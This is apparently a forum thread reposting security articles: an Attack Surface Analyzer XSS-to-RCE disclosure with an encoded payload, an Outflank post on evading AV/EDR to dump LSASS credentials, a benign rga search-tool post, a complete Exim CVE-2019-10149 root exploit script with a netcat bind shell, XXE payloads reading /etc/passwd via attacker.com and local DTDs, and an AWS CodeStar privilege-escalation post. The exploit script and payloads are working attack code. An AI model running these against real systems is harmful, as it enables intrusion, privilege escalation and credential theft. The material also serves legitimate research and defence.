123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101, 58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110, 111,114,101,39,125,93,125,41,59))> You can also submit the payload locally via this curl command: curl -vvv -ik -H "Host:localhost:8001" "http://localhost:8001/Home/StartCollection? 
Id=<img%20id=%225%22%20src=x%20onerror=eval(String.fromCharCode(118,97,114,32,80, 114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105, 110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99, 101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111, 99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102, 117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110, 118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101, 110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32, 105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43, 39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97, 119,110,40,123,102,105,108,101,58,39,99,97,108,99,46,101,120,101,39,44,97,114,103, 115,58,91,93,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86, 101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115, 101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97, 105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101, 58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111, 114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125, 41,59))>&File=false&Port=false&Service=false&User=false&Registry=false&Certificates=true" Switch back to the Scan tab (or click on it to reload it if it's already open) in the guest VM and see calc pop up. Calc in guest VM Incidentally, the command line value in procmon for running the calc looks like a kaomoji. Calc in procmon Funky Gifs Injecting the payload from VM host: Injecting from host into guest Injecting the payload locally: Localhost and curl The Good and the Bad [+] ASA is usually run as Admin. This allows ASA to have more visibility into the OS and give us better results. This means our RCE is as admin. [+] The ports are usually 8000 and 8001. Unless you are running something else on those ports, it's easy to discover machines running a vulnerable version of the ASA. [-] ASA is usually run in disposable VMs. You are not going to fingerprint your applications on a prod VM. But these VMs are still connected to something. How Can We Fix This? Don't bind the web server to all interfaces. Output encode Run Ids in the progress page. Enable NodeIntegration and other Electron Defenses in Electron.NET. See Security, Native Capabilities, and Your Responsibility The issue was reported to Microsoft Security Response Center on May 22nd 2019. Fixes NodeIntegration disabled and ContextIsolation enabled: #218 Not listening on all interfaces - in Gui/Properties/launchSettings.json: #220 encodeURIComponent the runId - in Gui/wwwroot/js/Collect.js: #220 Timeline What Happened When Report 22 May 2019 Acknowledgement 22 May 2019 MSRC asked for clarification 28 May 2019 MSRC confirmed fix was applied 06 June 2019 Fix was confirmed 14 June 2019 Disclosure 18 June 2019 Posted by Parsia Jun 18, 2019Tags: rce Thick Client Proxying - Part 9 - The Windows DNS Cache Sursa: https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/
  8. Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR Cornelis de Plaa | June 19, 2019 In this blog post we will explore the use of direct system calls, restore hooked API calls and ultimately combine this with a shellcode injection technique called sRDI. We will combine these techniques in proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike, while not touching disk and evading AV/EDR monitored user-mode API calls. As companies grow in their cybersecurity maturity level, attackers also evolve in their attacking capabilities. As a red team we try to offer the best value to our customers, so we also need to adapt to more advanced tactics and techniques attackers are using to bypass modern defenses and detection mechanisms. Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. So time for us to sharpen our offensive tool development skills. Source code of the PoC can be found here: https://github.com/outflanknl/Dumpert What are direct system calls? In order to understand what system calls really are, we first have to dig a little bit into Operating System architecture, specifically Windows. If you are old (not like me… ) and have a MS-DOS background, you probably remember that a simple application crash could result in a complete system crash. This was due to the fact that the operating system was running in real mode, which means that the processor is running in a mode in which no memory isolation and protection is applied. A bad program or bug could result in a complete crash of the Operating System due to critical system memory corruption, as there was no restriction in what memory regions could be accessed or not. This all changed with newer processors and Operating Systems supporting the so-called protected mode. This mode introduced many safeguards and could protect the system from crashes by isolating running programs from each other using virtual memory and privilege levels or rings. On a Windows system two of these rings are actually used. Application are running in user-mode, which is the equivalent of ring 3 and critical system components like the kernel and device drivers are running in kernel-mode which corresponds to ring 0. Using these protection rings makes sure that applications are isolated and cannot directly access critical memory sections and system resources running in kernel-mode. When an application needs to execute a privileged system operation, the processor first needs to switch into ring 0 to handover the execution flow into kernel-mode. This is where system calls come into place. Let’s demonstrate this privilege mode switching while monitoring a notepad.exe process and saving a simple text file: WriteFile call stack in Process Monitor . The screenshot shows the program flow (call stack) from the notepad.exe process when we save a file. We can see the Win32 API WriteFile call following the Native API NtWriteFile call (more on APIs later). For a program to save a file on disk, the Operating System needs access to the filesystem and device drivers. These are privileged operations and not something the application itself should be allowed to do. Accessing device drivers directly from an application could result in very bad things. So, the last API call before entering kernel-mode is responsible for pulling the dip switch into kernel land. 
The CPU instruction for entering kernel-mode is the syscall instruction (at least on x64 architecture, which we will discuss in this blog only). We can see this in the following WinDBG screenshot, which shows the unassembled NtWriteFile instruction: Disassembled NtWriteFile API call in WinDBG. The NtWriteFile API from ntdll.dll is responsible for setting up the relevant function call arguments on the stack, then moving the system call number from the NtWriteFile call in the EAX register and executing the syscall instruction. After that, the CPU will jump into kernel-mode (ring 0). The kernel uses the dispatch table (SSDT) to find the right API call belonging to the system call number, copies the arguments from the user-mode stack into the kernel-mode stack and executes the kernel version of the API call (in this case ZwWriteFile). When the kernel routines are finished, the program flow will return back into user-mode almost the same way, but will return the return values from the kernel API calls (for example a pointer to received data, or a handle to a file). This (user-mode) is also the place where many security products like AV, EDR and sandbox software put their hooks, so they can detour the execution flow into their engines to monitor and intercept API calls and block anything suspicious. As you have seen in the disassembled view of the NtWriteFile instruction you may have noticed that it only uses a few assembly instructions, from which the syscall number and the syscall instruction itself are the most important. The only important thing before executing a direct system call is that the stack is setup correctly with the expected arguments and using the right calling convention. So, having this knowledge… why not execute the system calls directly and bypass the Windows and Native API, so that we also bypass any user-mode hooks that might be in place? Well this is exactly what we are going to do, but first a little bit more about the Windows programming interfaces. The Windows programming interfaces In the following screenshot we see a high-level overview of the Windows OS Architecture: For a user-mode application to interface with the underlying operating system, it uses an application programming interface (API). If you are a Windows developer writing C/C++ application, you would normally use the Win32 API. This is Microsoft’s documented programming interfaces which consists of several DLLs (so called Win32 subsystem DLLs). Underneath the Win32 API sits the Native API (ntdll.dll), which is actually the real interface between the user-mode applications and the underlying operating system. This is the most important programming interface but “not officially” documented and should be avoided by programmers in most circumstances. The reason why Microsoft has put another layer on top of the Native API is that the real magic occurs within this Native API layer as it is the lowest layer between user-mode and the kernel. Microsoft probably decided to shield off the documented APIs using an extra layer, so they could make architectural OS changes without affecting the Win32 programming interface. So now we know a bit more about system calls and the Windows programming APIs, let’s see how we can actually skip the programming APIs and invoke the APIs directly using their system call number or restore potentially hooked API calls. Using system calls directly We already showed how to disassemble native API calls to identify the corresponding system call numbers. 
Using a debugger this could take a lot of time. So, the same can be done using IDA (or Ghidra) by opening a copy of ntdll.dll and lookup the needed function: Disassembled NtWriteFile API call in IDA. One slight problem… system call numbers change between OS versions and sometimes even between service pack/built numbers. Fortunately @j00ru from Google project Zero comes to the rescue with his online system call tables. j00ru did an amazing job keeping up with all system call numbers in use by different Windows versions and between builds. So now we have a great resource to look up all the system calls we want to use. In our code, we want to invoke the system calls directly using assembly. Within Visual Studio we can enable assembly code support using the masm build dependency, which allows us to add .asm files and code within our project. Assembly system call functions in .asm file. All we need to do is gather OS version information from the system we are using and create references between the native API function definitions and OS version specific system call functions in assembly language. For this we can use the Native API RtlGetVersion routine and save this information into a version info structure. Reference function pointers based on OS info. Exported OS specific assembly functions + native API function definitions. Now we can use the system call functions in our code as if they are normal native API functions: Using ZwOpenProcess systemcall function as a Native API call. Restoring hooked API calls with direct system calls Writing advanced malware that only uses direct system calls and completely evades user-mode API calls is practically impossible or at least extremely cumbersome. Sometimes you just want to use an API call in your malicious code. But what if somewhere in the call stack there is a user-mode hook by AV/EDR? Let’s have a look how we can remove the hook using direct system calls. Basic user-mode API hooks by AV/EDR are often created by modifying the first 5 bytes of the API call with a jump (JMP) instruction to another memory address pointing to the security software. The technique of unhooking this method has already been documented within two great blog posts by @SpecialHoang, and by MDsec’s Adam Chester and Dominic Chell. If you study these methods carefully, you will notice the use of API calls such as VirtualProtectEx and WriteProcessMemory to unhook Native API functions. But what if the first API calls are hooked and monitored already somewhere in the call stack? Inception, get it? Direct system calls to the rescue! In the PoC code we created we basically use the same unhooking technique by restoring the first 5 bytes with the original assembly instructions, including the system call number. The only difference is that the API calls we use to unhook the APIs are direct systems call functions (ZwProtectVirtualMemory and ZwWriteVirtualMemory). Using direct system call function to unhook APIs. Proof of concept In our operations we sometimes need Mimikatz to get access to credentials, hashes and Kerberos tickets on a target system. Endpoint detection software and threat hunting instrumentation are pretty good in detection and prevention of Mimikatz nowadays. So, if you are in an assessment and your scenario requires to stay under the radar as much as possible, using Mimikatz on an endpoint is not best practice (even in-memory). Also, dumping LSASS memory with tools such as procdump is often caught by modern AV/EDR using API hooks. 
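A rough way to spot such hooks (and to grab syscall numbers without a debugger) is to compare each Nt* stub in the on-disk ntdll.dll with its in-memory counterpart. The sketch below is an illustration only - it assumes a 64-bit Windows host, the third-party pefile package and the usual "mov r10, rcx / mov eax, <number>" stub layout; it is not the Dumpert code itself:

# Compare on-disk ntdll stubs with the loaded copy; a mismatch suggests a user-mode hook.
# Assumes 64-bit Windows, `pip install pefile` and the standard x64 syscall stub prologue.
import ctypes
import struct
import pefile

NTDLL = r"C:\Windows\System32\ntdll.dll"
FUNCS = [b"NtOpenProcess", b"NtProtectVirtualMemory", b"NtWriteVirtualMemory"]

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.GetModuleHandleW.restype = ctypes.c_void_p
kernel32.GetModuleHandleW.argtypes = [ctypes.c_wchar_p]
kernel32.GetProcAddress.restype = ctypes.c_void_p
kernel32.GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]

pe = pefile.PE(NTDLL)
exports = {e.name: e.address for e in pe.DIRECTORY_ENTRY_EXPORT.symbols if e.name}
ntdll_base = kernel32.GetModuleHandleW("ntdll.dll")

for name in FUNCS:
    disk = pe.get_data(exports[name], 8)   # clean prologue taken from disk
    mem = ctypes.string_at(kernel32.GetProcAddress(ntdll_base, name), 8)
    hooked = disk != mem                   # a JMP-style hook changes these first bytes
    syscall_nr = None
    if disk[:4] == b"\x4c\x8b\xd1\xb8":    # mov r10, rcx ; mov eax, imm32
        syscall_nr = struct.unpack("<I", disk[4:8])[0]
    print(f"{name.decode():26} syscall={syscall_nr} hooked={hooked}")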
So, we need an alternative to get access to LSASS memory and one option is to create a memory dump of the LSASS process after unhooking relevant API functions. This technique was also documented in @SpecialHoang blog. As a proof of concept, we created a LSASS memory dump tool called “Dumpert”. This tool combines direct system calls and API unhooking and allows you to create a LSASS minidump. This might help bypassing defenses of modern AV and EDR products. The minidump file can be used in Mimikatz to extract credential information without running Mimikatz on the target system. Mimikatz minidump import. Of course, dropping executable files on a target is probably something you want to avoid during an engagement, so let’s take this a step further… sRDI – Shellcode Reflective DLL Injection If we do not want to touch disk, we need some sort of injection technique. We can create a reflective loadable DLL from our code, but reflective DLL injection leaves memory artefacts behind that can be detected. My colleague @StanHacked recently pointed me to an interesting DLL injection technique called shellcode Reflective DLL Injection. sRDI allows for the conversion of DLL files to position independent shellcode. This technique is developed by Nick Landers (@monoxgas) from Silent Break Security and is basically a new version of RDI. Some advantages of using sRDI instead of standard RDI: You can convert any DLL to position independent shellcode and use standard shellcode injection techniques. Your DLL does not need to be reflection-aware as the reflective loader is implemented in shellcode outside of your DLL. Uses proper Permissions, no massive RWX blob. Optional PE Header Cleaning. More detailed information about sRDI can be found in this blog. Let our powers combine! Okay with all the elements in place, let’s see if we can combine these elements and techniques and create something more powerful that could be useful during Red Team operations: We created a DLL version of the “dumpert” tool using the same direct system calls and unhooking techniques. This DLL can be run standalone using the following command line: “rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump”, but in this case we are going to convert it to a sRDI shellcode. Compile the DLL version using Visual Studio and turn it into a position independent shellcode. This can be done using the ConvertToShellcode.py script from the sRDI project: “python3 ConvertToShellcode.py Outflank-Dumpert.dll” To inject the shellcode into a remote target, we can use Cobalt Strike’s shinject command. Cobalt Strike has a powerful scripting language called aggressor script which allows you to automate this step. To make this easier we provided an aggressor script which enables a “dumpert” command in the beacon menu to do the dirty job. The dumpert script uses shinject to inject the sRDI shellcode version of the dumpert DLL into the current process (to avoid CreateRemoteThread API). Then it waits a few seconds for the lsass minidump to finish and finally download the minidump file from the victim host. Now you can use Mimikatz on another host to get access to the lsass memory dump including credentials, hashes e.g. from our target host. For this you can use the following command: “sekurlsa::minidump C:\Dumpert\dumpert.dmp” Conclusion Malware that evades security product hooks is increasing and we need to be able to embed such techniques in our projects. 
In this blog we created references between the native API function definitions and OS-version-specific system call functions written in assembly. This allows us to use direct system call functions as if they were normal Native API functions. We combined this technique with an API unhooking technique to create a minidump of the LSASS process, and used sRDI in combination with Cobalt Strike to inject the dumpert shellcode into the memory of a target system. Detecting malicious use of system calls is difficult. Because user-mode programming interfaces are bypassed, the only place to look for malicious activity is the kernel itself, but with kernel PatchGuard protection it is infeasible for security products to create hooks or modifications in the running kernel. I hope this blog post is useful in understanding the advanced techniques attackers are using nowadays and provides a useful demonstration of how to emulate these techniques during Red Team operations. Any feedback or additional ideas, let me know. Sursa: https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
  9. rga: ripgrep, but also search in PDFs, E-Books, Office documents, zip, tar.gz, etc. Jun 16, 2019 • Last Update Jun 19, 2019 rga is a line-oriented search tool that allows you to look for a regex in a multitude of file types. rga wraps the awesome ripgrep and enables it to search in pdf, docx, sqlite, jpg, zip, tar.*, movie subtitles (mkv, mp4), etc. Examples PDFs Say you have a large folder of papers or lecture slides, and you can't remember which one of them mentioned GRUs. With rga, you can just run this: ~$ rga "GRU" slides/ slides/2016/winter1516_lecture14.pdf Page 34: GRU LSTM Page 35: GRU CONV Page 38: - Try out GRU-RCN! (imo best model) slides/2018/cs231n_2018_ds08.pdf Page 3: ● CNNs, GANs, RNNs, LSTMs, GRU Page 35: ● 1) temporal pooling 2) RNN (e.g. LSTM, GRU) slides/2019/cs231n_2019_lecture10.pdf Page 103: GRU [Learning phrase representations using rnn Page 105: - Common to use LSTM or GRU and it will recursively find a string in pdfs, including if some of them are zipped up. You can do mostly the same thing with pdfgrep -r, but you will miss content in other file types and it will be much slower: Searching in 65 pdfs with 93 slides each 0 5 10 15 20 pdfgrep rga (first run) rga (subsequent runs) run time (seconds, lower is better) On the first run rga is mostly faster because of multithreading, but on subsequent runs (with the same files but any regex query) rga will cache the text extraction, so it becomes almost as fast as searching in plain text files. All runs were done with a warm FS cache. Other files rga will recursively descend into archives and match text in every file type it knows. Here is an example directory with different file types: demo ├── greeting.mkv ├── hello.odt ├── hello.sqlite3 └── somearchive.zip ├── dir │ ├── greeting.docx │ └── inner.tar.gz │ └── greeting.pdf └── greeting.epub (see the actual directory here) ~$ rga "hello" demo/ demo/greeting.mkv metadata: chapters.chapter.0.tags.title="Chapter 1: Hello" 00:08.398 --> 00:11.758: Hello from a movie! demo/hello.odt Hello from an OpenDocument file! demo/hello.sqlite3 tbl: greeting='hello', from='sqlite database!' demo/somearchive.zip dir/greeting.docx: Hello from a MS Office document! dir/inner.tar.gz: greeting.pdf: Page 1: Hello from a PDF! greeting.epub: Hello from an E-Book! It can even search jpg / png images and scanned pdfs using OCR, though this is disabled by default since it is not useful that often and pretty slow. ~$ # find screenshot of crates.io ~$ rga crates ~/screenshots --rga-adapters=+pdfpages,tesseract screenshots/2019-06-14-19-01-10.png crates.io I Browse All Crates Docs v Documentation Repository Dependent crates ~$ # there it is! Setup Linux, Windows and OSX binaries are available in GitHub releases. See the readme for more information. For Arch Linux, I have packaged rga in the AUR: yay -S ripgrep-all Technical details The code and a few more details are here: https://github.com/phiresky/ripgrep-all rga simply runs ripgrep (rg) with some options set, especially --pre=rga-preproc and --pre-glob. rga-preproc [fname] will match an "adapter" to the given file based on either it's filename or it's mime type (if --rga-accurate is given). You can see all adapters currently included in src/adapters. Some rga adapters run external binaries to do the actual work (such as pandoc or ffmpeg), usually by writing to stdin and reading from stdout. Others use a Rust library or bindings to achieve the same effect (like sqlite or zip). 
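The adapter idea is easy to picture outside of Rust. The toy sketch below (Python, not rga's actual implementation; pandoc on the PATH is an assumption) mimics what such a preprocessor does for a single .docx file: convert it to plain text on stdout, then search that stream:

# Toy illustration of rga's adapter idea: extract text with an external tool, then grep it.
# Assumes pandoc is installed; rga itself is written in Rust and does far more than this.
import re
import subprocess
import sys

def grep_docx(pattern, path):
    # pandoc plays the role of an "adapter": binary document in, plain text out on stdout.
    text = subprocess.run(
        ["pandoc", "--to", "plain", path],
        capture_output=True, text=True, check=True,
    ).stdout
    for lineno, line in enumerate(text.splitlines(), 1):
        if re.search(pattern, line):
            print(f"{path}:{lineno}:{line}")

if __name__ == "__main__":
    grep_docx(sys.argv[1], sys.argv[2])   # e.g. python grep_docx.py hello report.docx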
To read archives, the zip and tar libraries are used, which work fully in a streaming fashion - this means that the RAM usage is low and no data is ever actually extracted to disk! Most adapters read the files from a Read, so they work completely on streamed data (that can come from anywhere, including from within nested archives). During the extraction, rga-preproc will compress the data with ZSTD to a memory cache while simultaneously writing it uncompressed to stdout. After completion, if the memory cache is smaller than 2 MByte, it is written to a rkv cache. The cache is keyed by (adapter, filename, mtime), so if a file changes, its content is extracted again.
Future Work
I wanted to add a photograph adapter (based on object classification / detection) for fun, so you can grep for "mountain" and it will show pictures of mountains, like in Google Photos. It worked with YOLO, but something more useful and state-of-the-art like this proved very hard to integrate.
7z adapter (couldn't find a nice-to-use Rust library with streaming)
Allow per-adapter configuration options (probably via env (RGA_ADAPTERXYZ_CONF=json))
Maybe use a different disk kv-store as a cache instead of rkv, because I had some weird problems with that. SQLite is great. All other Rust alternatives I could find don't allow writing from multiple processes.
Tests!
There's some more (mostly technical) todos in the code I don't know how to fix. Help wanted.
Similar tools
pdfgrep
this gist has my proof of concept version of a caching extractor to use ripgrep as a replacement for pdfgrep.
this gist is a more extensive preprocessing script by @ColonolBuendia
Sursa: https://phiresky.github.io/blog/2019/rga--ripgrep-for-zip-targz-docx-odt-epub-jpg/
  10. #!/bin/bash # # raptor_exim_wiz - "The Return of the WIZard" LPE exploit # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> # # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). # Improper validation of recipient address in deliver_message() # function in /src/deliver.c may lead to remote command execution. # (CVE-2019-10149) # # This is a local privilege escalation exploit for "The Return # of the WIZard" vulnerability reported by the Qualys Security # Advisory team. # # Credits: # Qualys Security Advisory team (kudos for your amazing research!) # Dennis 'dhn' Herrmann (/dev/tcp technique) # # Usage (setuid method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m setuid # Preparing setuid shell helper... # Delivering setuid payload... # [...] # Waiting 5 seconds... # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned # # id # uid=0(root) gid=0(root) groups=0(root) # # Usage (netcat method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m netcat # Delivering netcat payload... # Waiting 5 seconds... # localhost [127.0.0.1] 31337 (?) open # id # uid=0(root) gid=0(root) groups=0(root) # # Vulnerable platforms: # Exim 4.87 - 4.91 # # Tested against: # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] # METHOD="setuid" # default method PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost' PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost' # usage instructions function usage() { echo "$0 [-m METHOD]" echo echo "-m setuid : use the setuid payload (default)" echo "-m netcat : use the netcat payload" echo exit 1 } # payload delivery function exploit() { # connect to localhost:25 exec 3<>/dev/tcp/localhost/25 # deliver the payload read -u 3 && echo $REPLY echo "helo localhost" >&3 read -u 3 && echo $REPLY echo "mail from:<>" >&3 read -u 3 && echo $REPLY echo "rcpt to:<$PAYLOAD>" >&3 read -u 3 && echo $REPLY echo "data" >&3 read -u 3 && echo $REPLY for i in {1..31} do echo "Received: $i" >&3 done echo "." >&3 read -u 3 && echo $REPLY echo "quit" >&3 read -u 3 && echo $REPLY } # print banner echo echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit' echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>' echo # parse command line while [ ! -z "$1" ]; do case $1 in -m) shift; METHOD="$1"; shift;; * ) usage ;; esac done if [ -z $METHOD ]; then usage fi # setuid method if [ $METHOD = "setuid" ]; then # prepare a setuid shell helper to circumvent bash checks echo "Preparing setuid shell helper..." echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null if [ $? -ne 0 ]; then echo "Problems compiling setuid shell helper, check your gcc." echo "Falling back to the /bin/sh method." cp /bin/sh /tmp/pwned fi echo # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_SETUID exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." sleep 5 ls -l /tmp/pwned /tmp/pwned # netcat method elif [ $METHOD = "netcat" ]; then # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_NETCAT exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." sleep 5 nc -v 127.0.0.1 31337 # print help else usage fi Sursa: https://www.exploit-db.com/exploits/46996
  11. Arseniy Sharoglazov Exploiting XXE with local DTD files This little technique can force your blind XXE to output anything you want! Why do we have trouble exploiting XXE in 2k18? Imagine you have an XXE. External entities are supported, but the server’s response is always empty. In this case you have two options: error-based and out-of-band exploitation. Consider this error-based example: Request Response <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd"> %ext; ]> <message></message> java.io.FileNotFoundException: /nonexistent/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/usr/bin/nologin daemon:x:2:2:daemon:/:/usr/bin/nologin (No such file or directory) Contents of ext.dtd <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; See? You are using an external server for payload delivery. What can you do if there is a firewall between you and the target server? Nothing! What if we just put external DTD content directly in the DOCTYPE? Some errors will always appear: Request Response <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ]> <message></message> Internal Error: SAX Parser Error. Detail: The parameter entity reference “%file;” cannot occur within markup in the internal subset of the DTD. External DTD allows us to include one entity inside the second, but it is prohibited in the internal DTD. What can we do with internal DTD? To use external DTD syntax in the internal DTD subset, you can bruteforce a local dtd file on the target host and redefine some parameter-entity references inside it: Request Response <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd; ]> <message>any text</message> java.io.FileNotFoundException: /nonexistent/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/usr/bin/nologin daemon:x:2:2:daemon:/:/usr/bin/nologin (No such file or directory) Contents of sip-app_1_0.dtd … <!ENTITY % condition "and | or | not | equal | contains | exists | subdomain-of"> <!ELEMENT pattern (%condition;)> … It works because all XML entities are constant. If you define two entities with the same name, only the first one will be used. How can we find a local dtd file? Nothing is easier than enumerating files and directories. Below are a few more examples of successful applications of this trick: Custom Linux System <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamsa 'Your DTD code'> %local_dtd; Custom Windows System <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'> %local_dtd; Thanks to @Mike_n1 from Positive Technologies for sharing this path of always-existing Windows DTD file. 
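The pattern is mechanical enough to script. Below is a small helper sketch (hypothetical, not from the original article) that wraps the error-based file read from above around a chosen local DTD path and redefinable entity name; more platform-specific examples follow after it:

# Build an error-based XXE payload around a local DTD file, following the technique above.
# The DTD path, entity name and file to read are target-specific assumptions.
def build_xxe(local_dtd, entity, target="file:///etc/passwd"):
    # &#x25; is an escaped '%' so the nested parameter entities survive the internal DTD subset.
    return f'''<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "{local_dtd}">
<!ENTITY % {entity} '
<!ENTITY &#x25; file SYSTEM "{target}">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<message>any text</message>'''

# Example: the docbookx.dtd / ISOamsa pair from the Linux example above.
print(build_xxe("file:///usr/share/yelp/dtd/docbookx.dtd", "ISOamsa"))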
Cisco WebEx <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'> %local_dtd; Citrix XenMobile Server <!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"> <!ENTITY % Body '>Your DTD code<!ENTITY test "test"'> %local_dtd; Custom Multi-Platform IBM WebSphere Application <!ENTITY % local_dtd SYSTEM "./../../properties/schemas/j2ee/XMLSchema.dtd"> <!ENTITY % xs-datatypes 'Your DTD code'> <!ENTITY % simpleType "a"> <!ENTITY % restriction "b"> <!ENTITY % boolean "(c)"> <!ENTITY % URIref "CDATA"> <!ENTITY % XPathExpr "CDATA"> <!ENTITY % QName "NMTOKEN"> <!ENTITY % NCName "NMTOKEN"> <!ENTITY % nonNegativeInteger "NMTOKEN"> %local_dtd; Timeline 01/01/2016 — Discovering the technique 12/12/2018 — Writing the article :D 13/12/2018 — Full disclosure 2018 DTD OOB WAF XML XXE Sursa: https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
  12. Escalating AWS IAM Privileges with an Undocumented CodeStar API June 18, 2019 Spencer Gietzen Introduction to AWS IAM Privilege Escalation There are an extensive amount of individual APIs available on AWS, which also means there are many ways to misconfigure permissions to those APIs. These misconfigurations can give attackers the ability to abuse APIs to gain more privileges than what was originally intended by your AWS administrator. We at Rhino Security Labs have demonstrated this in the past with our blog post on 17 different privilege escalation methods in AWS. Most of these privilege escalation methods rely on the IAM service for abuse. An example of this is the “iam:PutUserPolicy” permission that allows a user to create an administrator-level inline policy on themselves, making themselves an administrator. This blog will outline a new method of abuse for privilege escalation within AWS through CodeStar, an undocumented AWS API, as well as two new privilege escalation checks and auto-exploits added to Pacu’s “iam__privesc_scan” module. AWS CodeStar AWS CodeStar is a service that allows you to “quickly develop, build, and deploy applications on AWS”. It integrates a variety of other different AWS services and 3rd party applications (such as Atlassian Jira) to “track progress across your entire software development process”. It is essentially a quick, easy way to get your projects up and running with your team in AWS. CodeStar Undocumented APIs Like many AWS services, CodeStar has some public-facing APIs that are not publicly documented. In most cases, these exist for convenience when browsing AWS through the web console. For example, CodeStar supports the following APIs, but they are not documented in the official AWS documentation: codestar:GetTileData codestar:PutTileData codestar:VerifyServiceRole There are more undocumented APIs than on this list–the other non-listed APIs are typically used by your web browser to display and verify information in the AWS web console. I discovered these undocumented APIs by simply setting up Burp Suite to intercept my HTTP traffic while browsing the AWS web console and seeing what showed up. Here is an example of some requests Burp Suite picked up while browsing CodeStar in the AWS web console: codestar:CreateProjectFromTemplate One of the undocumented APIs that we discovered was the codestar:CreateProjectFromTemplate API. This API was created for the web console to allow you to create sample (templated) projects to try out CodeStar. If you look at the documented APIs for CodeStar, you’ll only see codestar:CreateProject, but this page references project templates as well. As long as the CodeStar service role exists in the target account, this single undocumented API allows us to escalate our privileges in AWS. Because this is an undocumented API and people typically don’t know it exists, it’s likely not granted to any users in AWS directly. This means that although you only need this single permission to escalate privileges, it will likely be granted with a broader set of permissions, such as “codestar:Create*” or “codestar:*” in your IAM permissions. Because those are using the wildcard character “*”, it expands out and includes codestar:CreateProjectFromTemplate. If you needed another reason to stop using wildcards in your IAM policies, this is it. The following AWS-managed IAM policies grant access to 